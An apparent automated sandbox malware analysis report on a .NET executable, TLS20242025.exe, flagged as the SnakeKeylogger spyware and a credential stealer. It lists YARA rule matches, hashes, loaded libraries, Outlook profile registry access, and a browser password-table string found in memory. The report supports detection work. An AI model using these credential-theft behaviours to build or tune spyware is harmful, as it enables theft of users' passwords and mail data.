Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TLS20242025.exe.50e0000.5.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 0.2.TLS20242025.exe.50e0000.5.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@3/3

Source: C:\Users\user\Desktop\TLS20242025.exe

Mutant created: NULL

Source: TLS20242025.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: TLS20242025.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\TLS20242025.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002D78000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002D88000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TLS20242025.exe

ReversingLabs: Detection: 35%

Source: unknown	Process created: C:\Users\user\Desktop\TLS20242025.exe "C:\Users\user\Desktop\TLS20242025.exe"
Source: C:\Users\user\Desktop\TLS20242025.exe	Process created: C:\Users\user\Desktop\TLS20242025.exe "C:\Users\user\Desktop\TLS20242025.exe"
Source: C:\Users\user\Desktop\TLS20242025.exe	Process created: C:\Users\user\Desktop\TLS20242025.exe "C:\Users\user\Desktop\TLS20242025.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\TLS20242025.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: TLS20242025.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: TLS20242025.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

.NET source code contains potential unpacker

Source: TLS20242025.exe, ExportProvider.cs

.Net Code: CreateExportFactory

Source: TLS20242025.exe

Static PE information: 0xEA086D61 [Thu Jun 3 16:27:13 2094 UTC]

Source: TLS20242025.exe

Static PE information: section name: .text entropy: 7.257003686976549

Source: C:\Users\user\Desktop\TLS20242025.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe	Memory allocated: 2730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Memory allocated: 48E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Memory allocated: 1050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Memory allocated: 2B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Memory allocated: 4B10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597687	Jump to behavior
